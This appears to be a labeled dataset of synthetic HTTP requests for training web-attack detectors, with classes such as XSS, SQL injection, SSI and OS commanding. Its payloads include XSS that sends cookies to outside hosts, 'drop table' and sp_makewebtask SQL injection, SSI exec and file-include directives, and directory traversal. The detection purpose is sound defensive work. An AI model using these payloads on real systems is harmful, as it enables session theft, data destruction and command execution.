User-Agent: Mozilla/1.5 (X11; U; Linux i586 8.6; sn-0c; rv:2.8.3) Gecko/88109394
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6621x951
Via: 1.7 www.ilemwtvh.tiff, HTTP/5.1 131.93.125.246
Transfer-Encoding: identity
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 917 www.ashesmu.htm "elta4zdhaod" "Sun, 11 Jul 04 04:27:49 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38480
Start - Id: 48041
class: XSS
GET /rVK@7rQC2PN-Jp@XTp/qnakOZPSM2d0.X8hbg/izsqphSYU5W1WEgDY/edfwhaegwesgen8tee/hsamN.jsp?wnsme6tSIfmn=741324&lrN7Mes=%3Cdiv+style%3D++%22+++++behaviour%3A+url%28%5Bhttp%3A%2F%2Fwww.ic.com%2Fscript%2Feow.asmx%5D%29%3B++++%22++%3E&irotTepdDlo2eel=t%7Ei&alwAs=riL&fo2l7h=xtjelsstdt1%5D0pt&2RkMoRWscriptnetcatIx=htN+ud%5Cneohome+ HTTP/1.0
Host: 5.175.75.193
Connection: keep-alive
Accept: application/*;q=0.4, video/*, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, deflate, compress;q=0.6
Accept-Language: *
Cache-Control: d5teeT=nn
Client-ip: 57.224.52.157
Cookie: e1hte=lLjJuojWhJt;te0pnl=iLzRO9;mdn=nupimD;fBfnetu4=0912933;satose7P=oe
Cookie2: $Version="85"
Date: Sat, 06 Sep 08 13:04:41 UTC
ETag: "0ylSt0lEOmXK8dtOiEj"
Expect: sntr=swesei6
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 01 Jul 05 15:49:05 CET
If-Unmodified-Since: Sun, 26 Apr 09 09:30:08 CET
If-Match: "L.-Y4av_4D01@iUUh"
If-None-Match: *
If-Range: Sun, 26 Feb 06 11:35:53 GMT
Max-Forwards: 5
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM aWV0Unpub3NwdGRuTHJ0dHd0b2RoZGl0TG1pOEhqbmhlaWhvbnc4c3R3cmk=
Authorization: NTLM MGJzZ2lqbWllcmVBeThudGVhZG93d2E5cmxpeXZtZW5lT3dzOG1jc2FhZXNy
Range: 8804-
Referer: http://ie06rso.be/oniSn.dll
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: 9viahd
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 960x8995
Via: zirf/4.5 www.1f6n.html, 5.4 51.103.65.244:75652, 6.3 www.tu1s.jpeg
Transfer-Encoding: compress
Upgrade: odv/3.8, cye8/8.2
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 65907210356
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48041
Start - Id: 41713
class: SqlInjection
GET /nslh7tsnsta/lbkM8/hS_vRNX9d/-jdWAXHZqapk.php?cbcsfo=fJ1&rhm38l=08213711&xmlpsdlfbaIf4=hhev%40s&dxlu=93052209&lone3ewgnn=%27%3B+++drop+++table+++++stpvPtmneath HTTP/1.1
Host: 12.247.105.84:80
Connection: sois
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr, windows-1250, iso-8859-9;q=0.8, iso-8859-2, us-ascii
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 60.67.60.69
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="7"
Date: Fri, 19 Mar 04 04:46:52 CET
ETag: "kvD06B13hR6i7mc2g3"
Expect: paem=jatrS32;hyrdbn
From: daatsa@4adiaM.fr
If-Modified-Since: Fri, 25 Feb 05 12:24:40 GMT
If-Unmodified-Since: Sat, 31 Mar 07 05:07:04 UTC
If-Match: "GlBGxIFWRYIOYCD4w"
If-None-Match: *
If-Range: *
Max-Forwards: 64
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest nc=B6e30dfE
Authorization: euni 4arbhzM=tnrh
Range: 864538-4,42725-309719
Referer: http://www.b6dpe.ch/agc59avh/oi3n/dheplre/uayeSRRa.bin
TE: trailers,chunked
Trailer: Via
User-Agent: aast4/3.0.9.7
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5958x694
Via: 9.7 142.102.233.244, 1.1 www.e0YsRu9n.css, 6.5 12.215.124.91
Transfer-Encoding: deflate
Upgrade: er1tt/1.6, mxcea/2.3, tute7/7.3
Warning: 916 www.eheltm.css "rn5mT" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41713
Start - Id: 36962
class: LdapInjection
GET /ineoac/e_m4VrqS2MzHG1yj8FMN/khnn6iillliw/nn1syc/3dhs2zKetotsuhomo6p.png?hda=rYcHqa%40&ogah=%29+++%28+++%7C%28N3re%3DLe*%29&_JfromkU4=4317180 HTTP/1.1
Host: 43.13.162.51
Connection: eEtiwoe
Accept: application/*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: x=dr
Client-ip: 248.80.57.117
Cookie: rsl9tn=eedlae4an;y4GB=ht|u
Cookie2: $Version="311"
Date: Fri, 18 Jul 08 07:43:43 CET
ETag: W/"0hNPjWgcQZJH5il"
Expect: erhfrxn=tA8teDd;dhrutcnn
From: ooeh@nqieoausen.gov
If-Unmodified-Since: Sat, 23 Dec 06 24:57:46 GMT
If-Match: *
If-None-Match: "RRoILQl5-myVUYsqyLsh"
If-Range: *
Max-Forwards: 27
Pragma: no-cache
Proxy-Authorization: Digest opaque="cttu"
Authorization: Digest algorithm=MD5
Range: 84-,-422477,1197-5319
Referer: http://www.gudadaho.fr/eeodxce/aRi1TpoS.mpg
TE: deflate;q=0.7
Trailer: Range
User-Agent: hgsCRaE@ http://www.iixkt.de
UA-CPU: Sparc
UA-Disp: 553,0581,32
UA-Pixels: 8538x2200
Transfer-Encoding: gzip
Upgrade: voikit/1.2
Warning: 812 30.165.31.159 "aiaexjhepibyi" 
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36962
Start - Id: 41094
class: SqlInjection
GET /nou/slsrxNa/amkz-TCXMv/inimt.asp?nsaet=982409&uhtpasscat4BAO2Yqgy=Otrt&eimn=7bkseaAruenltt1r&7htpass8B3zksdVV=x6n.&ttts=78523&irtLatiesewy=1&wareqlhx=tPoDPFR&qAnycZgedqlj=7023736634&torslrurhh0=%27%3B+++EXEC++++master.dbo.sp_makewebtask+++++%27c%3A%5Cinetpub%5Cwwwroot%5Citt.tiff%27%2C+++++%27SELECT+++spbocGb++++FROM+++gooTedhe+++WHERE++++xtype%3D%27%27U%27%27%27&uesTzthe19nlta=nh%22n%24bconnect%5Dyp%5D%22%3Ao%27a8ipasswd&enSSoe4qdzmlau=8 HTTP/1.1
Host: 116.38.124.72
Connection: itn03e
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: Dreey4cr-Oia2a;q=0.9, h-i6;q=0.6, oo-pai;q=0.8, ra-nleBiju;q=0.5
Cache-Control: max-stale
Client-ip: 183.139.157.162
Cookie: seepe4Ejene=snGdswds\window.openrsterfn:;H8tCeAPer=cepassthruq oxtermml)cd: r$forms;uTiOpuaarta=u;sg35sO=0tdxt;1mail0vSlibservicesuEMYchild=ksfbn
Cookie2: $Version="4"
Date: Thu, 22 Jan 09 21:09:44 GMT
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: ixits@nymeatnrae.gov
If-Modified-Since: Tue, 26 Apr 05 12:14:35 GMT
If-Unmodified-Since: Thu, 25 Jun 09 22:34:23 UTC
If-Match: "3TsI6EY@dmn7cJp"
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: /Cr3nf/eF6o4es/kttrgdag.php4
TE: chunked;q=0.1,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 5.6; ha-o4; rv:0.4.0) Gecko/93205649
UA-CPU: StrongARM
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: deflate
Upgrade: trcoos/7.4, ocdNs/3.5
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41094
Start - Id: 39903
class: SSI
GET /oc5qde/tOdj@CxBGIFC2W64d/hhg/n6ac5E/evZU-lp.oqYSwdY/ol@1NcOrCcU@p4HV/n98SSXXPOipZD-U/a1Gs4_UyhrGpIW/roeoanoorsheI/ot7oo1lhHEuEovUt/ayu.jpeg?w0X.JehttpMf9=atam3iu+ HTTP/1.1
Host: 148.204.136.151:80
Connection: keep-alive
Accept: application/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: a-w, ecee-zh
Cache-Control: no-store
Cookie: q5.i=wioyiamlh;emaGelttcntek=dDj;eaY=5922099;0qEoe=D;Lldelete.9RNchildg7k=<!  #<!-- #exec  cmd="id"-->;m5bOYMg02=rsgC(
Date: Tue, 06 Apr 10 12:27:36 UTC
ETag: "nP9DxkYaKIBTef9"
If-Unmodified-Since: Fri, 18 Jan 08 10:55:36 CET
If-None-Match: *
If-Range: "4dYODhB0.Av1fWJKYG"
Max-Forwards: 3739
Pragma: V=Eoanec
Authorization: Digest nonce
Referer: http://b4goosn.com/eTialib/7hg6yo/tsg4jl/ltot5p.fgf
TE: trailers,trailers,chunked;q=0.5
Trailer: Pragma
User-Agent: Ievoqtti
Via: FTP/0.4 www.is8ftsm.js, 5.2 www.nhAh7.tiff:806, 6.8 175.126.216.111:36
Transfer-Encoding: deflate

null

End - Id: 39903
Start - Id: 43904
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: www.yocmAl.biz
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.0, compress;q=0.0
Accept-Language: nltaght-enztEp, 7-farte46h;q=0.5
Cache-Control: max-stale
Client-ip: 196.15.105.143
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Sun, 19 Aug 07 01:52:54 GMT
ETag: W/"Mtbl0u9YUt.3jBz34"
Expect: Eneu5=ro8xe;wiewgo=tteuss0
From: hcfetsen@Poenvmrtr.biz
If-Modified-Since: Tue, 14 Jun 05 24:13:49 CET
If-Unmodified-Since: Mon, 29 Nov 04 07:23:02 UTC
If-Match: "bg@kYjpoQExGydxa4FQ2"
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: Wed, 10 Oct 07 10:31:02 CET
Max-Forwards: 031
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: I7d4 pxamohog=uiio
Authorization: jaier uicSij=Hxcaxs
Range: 6652-,-36477,66590-93
Referer: http://www.int0e.ch/at8U/sthd8m/pi2taoA/unfoj.zip
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/2.6 (Windows; U; Windows NT 8.3; wH-Ss; rv:5.8.4) Gecko/65660539
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 9hlsa/0.8 98.223.139.44, diwj/5.3 36.2.104.201, 3.6 154.107.131.214
Transfer-Encoding: deflate
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 432 www.i7dte.html "w6tbf" "Sat, 14 Feb 04 01:47:29 UTC"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43904
Start - Id: 47456
class: XSS
GET /e_ohG_njocrm./8mAhttpscselectJk/xLWjQTW/eOoprel7t1tras5Z3u/h8sJZBkC_wNMl67QZuoy.gif?ehedhDtdudqHhes=81&7rCt=%3Clink++++rel++++%3D+%22stylesheet+++%22+++href+++%3D+++%22+++++javascript%3A+%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.laet.com%2Fcgi-bin%2Fvetr.cgi%27%2Bdocument.cookie%29%3B%5D%22++%3E&rTkmaai=iyXWSJQ_&0nanw6=4463&rsszsOrSesqt1te=ectePit4ftnbnn&BYDkja=evalcdsn&hshk=877&tdr=08599&iu8al=99z&lve7cg=hiE%26eiae4i HTTP/1.1
Host: www.dttt.it:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 146.143.28.253
Cookie: tva=uwindow.openhome1;rWuiutYt=65355443;weowtOrs= as;ugeeflvtll=brdnh;r4trn=83;Iynei4tixx=39
Cookie2: $Version="073"
Date: Mon, 04 Feb 08 04:36:54 UTC
ETag: W/"rp9_AP4VQ-1SnvWS"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 09 May 04 22:25:54 UTC
If-Unmodified-Since: Mon, 29 Nov 04 18:59:54 GMT
If-Match: "BsBhTYni4neyorVU2"
If-None-Match: *
If-Range: "E8xMKufH0cdVvARJ"
Max-Forwards: 0
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=erorm7y
Range: 9547-817639
Referer: /regM/tamtgen/iTinef9.cgi
TE: chunked;q=0.1,trailers
Trailer: From
User-Agent: hMos (dQMpkn8wAd; n88Y02; ncBC.hZjv9)
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4532x5831
Via: HTTP/4.5 190.174.118.201, HTTP/6.5 193.41.121.221
Transfer-Encoding: compress
Upgrade: If3b/5.7, ceh/7.0, ns8/1.8
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 226091720709125
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47456
Start - Id: 47078
class: XSS
GET /GexecTRbSL/cYv/2nph-EwwWwpdocument0X/Kou.php3?loec=64&omf0medqa9wsrhY=f+t%25u3d&osrnndhls4eedpo=In%25&wlebJnufdiEda=ahrtsocmd&ed2alaeooswh=cpu8r&ihsuEb6qer=30901970&_input1tQ0j9o=9uoN9ap&saa=4031&mr=361&f7srsp8dr3zese=tgPx&seCnae5dwld5to=Nmctht72&tyof=%3Cbgsound++++src+++%3D+%22+javascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F190.143.140.214%2Fri.asp%27%2Bdocument.cookie%29%3B%5D+%22++%3E&rsotulhtoiTctff=nasnTC7asrswn&otfmeieaI=iiLGeoorFeetieE HTTP/1.1
Host: www.r0eenx.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=8931
Client-ip: 25.88.59.6
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="2"
Date: Tue, 05 May 09 24:48:32 GMT
ETag: W/"qivQOJMh@tYyao0_E"
Expect: 100-continue
From: danndie@tun81utu.cz
If-Modified-Since: Mon, 20 Jun 05 03:23:00 UTC
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Jun 05 06:51:45 CET
Max-Forwards: 7
MIME-Version: 6.8
Pragma: esannB=eoOt9ke
Proxy-Authorization: sevi uteRs=ionsesm
Authorization: NTLM amljdEV1aTVpZHJ5YWV6b3JuRGFlYXNvaWFzaGhjRW1uZTMzZ2g=
Range: 44535-
Referer: http://dtoa.fr/UK2riH/rtlh/liost.fgf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.0 (X11; U; Solaris 1.0; 4c-fs; rv:4.0.5) Gecko/92969307
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 071x3560
Via: ee3jn/1.2 13.19.213.79:8110
Transfer-Encoding: identity
Upgrade: keTun/5.2, keYr/6.3, ierin/2.2, rla/1.3
Warning: 442 www.vtezo.tiff "ttcnbUocs8oIeuuB0" "Thu, 26 Jan 06 15:52:02 CET"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47078
Start - Id: 39812
class: SSI
GET /f9MuO/vi1/nMe7/p3lA/o6m-1ROcoCIMejRMT/a3W/eBFJ-RfBi4i2-TP/tiirsa/ftbaIlemamrtxe/sP@b-kphpZ9/qH/nC.tiff?haElsohinfIw=4ntleyurees0&b-Kxallj=nVo&fe=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&HYdV6Mm4V=Dht HTTP/1.0
Host: www.mdosuhs.com
Connection: keep-alive
Accept: audio/*;q=0.6, image/*;q=0.6
Accept-Charset: x-mac-chinesesimp, iso-8859-7;q=0.1, utf-7, x-mac-chinesetrad, iso-8859-8;q=0.0
Accept-Encoding: identity;q=0.8, gzip, identity;q=0.0, gzip, compress
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 120.141.87.80
Cookie: d6UzeR=587728253;iircpi5img=nplU_;oeEgaatxnDnt=e1ta8|
Cookie2: $Version="9"
Date: Sun, 02 Jan 05 17:50:05 GMT
ETag: "VO1ILj1Cs3O_J_ANRrS"
Expect: eE2cus9
From: aahRts3@gtwy5atsos.org
If-Modified-Since: Fri, 27 Feb 04 09:56:29 UTC
If-Unmodified-Since: Thu, 30 Mar 06 11:17:16 UTC
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: Sun, 29 Apr 07 13:55:12 UTC
Max-Forwards: 7
MIME-Version: 2.7
Pragma: Psish=e2susee
Proxy-Authorization: Digest username="eege"
Authorization: Digest username="oeue"
Range: 9717-347450,4-
Referer: /raaeR/s0nt/7nneeoH/ztqiou.cgi
TE: trailers
Trailer: Connection
User-Agent: anJa4R http://www.lhtIamci.it
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: 9.6 83.138.212.87, HTTP/1.3 18.156.66.62
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39812
Start - Id: 41975
class: SqlInjection
GET /aru/7i0oiupnhaylMogt2l/lsme/yerrinsreIldynek/sWwh-9-b5Ltgiv4lY@/tiD/t4IMCH4YcX2/ntftst8cissizeoU1h/9U8wOGPHI/IdMwnoteldnooaio/execW.bin?nt1homAwa=%27%3B+++++drop++table++pioenOovdeH HTTP/1.0
Host: 199.44.106.231
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: evs=Cthn
Client-ip: 124.187.36.33
Cookie: 2cr5wi6taye=rBYh;passthru6QYNzRHy=6334936;z8taxhDean=~lt9ei ;nedanbst6ecnma8=6;Ntliiyi=23
Cookie2: $Version="6"
Date: Fri, 18 Mar 05 16:15:25 GMT
ETag: "F6yDl2ELctqx5Q34"
Expect: 100-continue
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Sat, 28 Apr 07 04:06:48 UTC
If-Unmodified-Since: Wed, 19 Apr 06 14:17:42 GMT
If-Match: *
If-None-Match: "mPM7zyqu8.scSvI"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 1784
MIME-Version: 0.8
Pragma: h=6
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Digest realm
Range: -221064
Referer: /otcxans.asp
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: eeint/3.0.7
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: drtyN/9.2 www.uvoo.tiff, 5.1 169.244.158.211
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 701 120.215.22.150 "m6Umsse8crm8abges" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 382676240
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41975
Start - Id: 43468
class: OsCommanding
GET /eciur7wxs/6aI/aJkbXWEXn@a/mxTqtGH.l0f0knmBY2/thdt@8edciCLAXMN/wwTMfmme0yrv.tiff?dause7pma=Sdz&oDsrsatAees=L4ndr&owrnceateeDU1=4&enhpgett1=859906&eonriiaoErld=6o2.ZTM&xes6ta=sn5&L8RrF=or-nvbscript+ubody%28&ceub=%2Fbin%2Fps%2500++%7C&dnet=Ereplace&ytn=yTFvabv&h6sgeaszwnao=a3rNessyt3g&Ffam8io4ctep8=e%3BOscript%27tHdhp&4wafoow4tit3=prhssh%26is%3Cl&sht=pux&t3mnteuhpaltNoc=nit HTTP/1.1
Host: 123.89.237.206
Connection: tmpEh
Accept: audio/*, image/gif;q=0.6
Accept-Charset: x-mac-japanese;q=0.7, utf-7;q=0.7, x-mac-ce
Accept-Encoding: compress
Accept-Language: dfSodtm-iu9;q=0.3, ada-3
Cache-Control: no-cache
Client-ip: 5.223.71.17
Cookie: 40objectwhereAUe3=445;oeta9ssb7gfl9=Tpgas
Cookie2: $Version="803"
Date: Thu, 08 May 08 17:27:46 CET
ETag: "W_D-MMI1DqBWzuzV"
Expect: 100-continue
From: t3bs@fsiaebtorf.it
If-Modified-Since: Wed, 13 Jan 10 04:11:00 CET
If-Unmodified-Since: Thu, 26 Feb 04 19:20:38 UTC
If-Match: "Maumbc6jt1iRmhTB"
If-None-Match: *
If-Range: Sun, 20 Jan 08 02:41:32 GMT
Max-Forwards: 73
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest username="ncuenm"
Authorization: Xen4E eseoerle=ctpscgn
Referer: http://www.htsze.cz/ocfcrft.asp
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/2.0 (Windows; U; Win98 8.8; Pe-ft; rv:2.3.4) Gecko/31004462
UA-CPU: Sparc
UA-Pixels: 828x8678
Via: 4.8 www.u0oesl.js, 8.5 233.103.69.34
Transfer-Encoding: gzip
Upgrade: bnReje/6.6, oSox9o/4.0, sAohc/3.7, awFn5s/4.5
Warning: 666 166.163.91.248 "reqnetwydVCbEhnmif" "Thu, 16 Oct 08 05:40:51 UTC"
----: -----------------------------

null

End - Id: 43468
Start - Id: 39072
class: LdapInjection
PUT /tXKsq2beLw17/lALiXNX/catZIz/lpor9/pmTFdzXSgTkh8x/tauoabptfiyoe/hhnha9a/eqn7wCT/LY7/jimgVVopassthruK-Bv@kK2ftp.shtml? HTTP/1.1
Content-Length: 167
Content-Language: esihn,a
Content-Encoding: identity
Content-Location: /y9feed.tiff
Content-MD5: Z2lzaWlpUmdlc29oYmJldA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Aug 08 10:22:29 CET
Last-Modified: Fri, 13 Apr 07 23:22:39 GMT
Host: 60.14.65.115
Connection: osEtu5ac
Accept: text/*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.8, identity;q=0.5, deflate;q=0.5, gzip;q=0.2, gzip
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 94.224.234.137
Cookie: 5i=)    (  |   (  cn=*o 'brien*  )(mail =*o'brien* );rrcvaiem6rtr0tl=99
Cookie2: $Version="967"
Date: Thu, 09 Nov 06 08:42:44 UTC
ETag: W/"yvzX9iqgrv6V52Mvwhh"
Expect: At1t
From: tr6Rzr@s2NsE.cz
If-Modified-Since: Tue, 08 Sep 09 19:41:56 UTC
If-Unmodified-Since: Wed, 27 May 09 12:07:03 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Feb 04 05:09:49 CET
Max-Forwards: 44
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic aUhlbzo3dHBhemxt
Authorization: NTLM dGVhZHRlT2luaWVoZXdUb2VoaWVFSWlkZXNpWGkyaDNn
Range: -798,89211-,080300-12
Referer: http://nEiCe3.org/L7ie/e8yg6a/s7rn7/ndbl5t/odrhTe.jsp
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/4.3 (compatible; MSIE 9.7; Windows NT; siHem; doyleTy; 1iepsl)
UA-CPU: 68000
UA-Disp: 5522,0953,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 427x4997
Via: DuiLns/6.4 164.25.133.152, eiir/0.0 59.143.131.36:538, FTP/2.3 208.214.52.185
Transfer-Encoding: gzip
Upgrade: oe8sa5/3.6, asot/7.7, vIoul/0.4, Oitiff/6.5
Warning: 577 138.2.104.195 "uIre1eno" "Thu, 18 Mar 04 10:51:09 GMT"
X-Forwarded-For: 35.165.196.147
X-Serial-Number: 53018392304378
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

et3aoe5ot=keOwasmha&6LHv4YzUwJinputj=ev@X1s_Z.W&pqameih=97802027&tn75iTinq=259298&yhjteuartDqtao=tR0S0xM.k&-mTh-Z=595&4XGgmPRKdeleteUe=29435961&aebhal1uNlosbPe=olleS

End - Id: 39072
Start - Id: 50010
class: XPathInjection
POST /3crasjsmotcPh0dtwbl/76O6.m8i/0ezy@Q1Y/e2p.jsp? HTTP/1.0
Content-Length: 127
Content-Language: qlnws,Tier3dhd,tj
Content-Encoding: identity
Content-Location: /ruo7v/lejwf/ur0nnmrh/oEiib.tar
Content-MD5: aTluYWFvdXRvZXF0bWF0Mw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Jul 09 20:22:30 GMT
Last-Modified: Fri, 03 Feb 06 02:08:46 GMT
Host: www.icdd.uk:80
Connection: keep-alive
Accept: audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 76   or     ltl8se/4h9pte/h/child::node()[position()=6]   or     60=
Cache-Control: max-stale=8076
Client-ip: 119.180.39.9
Cookie: sle=746;etcljaanE9n=lgi4uppr3s
Cookie2: $Version="209"
Date: Thu, 28 Feb 08 20:16:47 CET
ETag: "8zDNHlzc1TiEHMJ9"
Expect: 100-continue
From: Ecil@targ.fr
If-Modified-Since: Tue, 08 Mar 05 08:24:03 GMT
If-Unmodified-Since: Fri, 19 Oct 07 22:27:12 GMT
If-Match: *
If-None-Match: "@6IlHbsXJzIkh58o2wQk"
If-Range: "Y5xw@QZ.lyASgcJA8"
Max-Forwards: 74
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest nc=95A56604
Authorization: gm4m d2tqs=mam0s
Range: 1-0902
Referer: http://www.imcrl.cz/IeyP.asp
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 3.3; hh-bv; rv:7.0.8) Gecko/28876114
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 957x1532
Via: 6.9 192.205.223.149:6, FTP/3.3 105.239.103.166:42, 0i5D/1.9 145.181.113.198
Transfer-Encoding: compress
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 530 www.qhehor.gif:76 "9eueIrtmcdq6tn" "Wed, 30 Jan 08 10:22:21 CET"
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

DYNPYw.SHi=81017807&hfoan=ezV9H5&crshToust4ic=7556438&ooVscriptYF=776172&1iSeneqraTe=1982382&ndeif=oawincludeeheaer&BHRYtlx=1Pk

End - Id: 50010
Start - Id: 48258
class: XSS
PUT /ahgadhbunidahe9eet/@q.XR_@p/n.In/ynrGQjformq5IiZ9E5/BDT7obKh13d08xp_6/2sHymtg2.png? HTTP/1.1
Content-Length: 364
Content-Language: norif,0obhc
Content-Encoding: identity
Content-MD5: aWUxM3NjcnNwMHRiZGllag==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 May 06 12:02:58 CET
Host: 111.233.239.172
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic, x-mac-arabic
Accept-Encoding: compress;q=0.2, identity;q=0.6, compress, compress;q=0.5, gzip
Accept-Language: etH-p;q=0.6, lt-o4dNau8;q=0.6
Cache-Control: no-cache
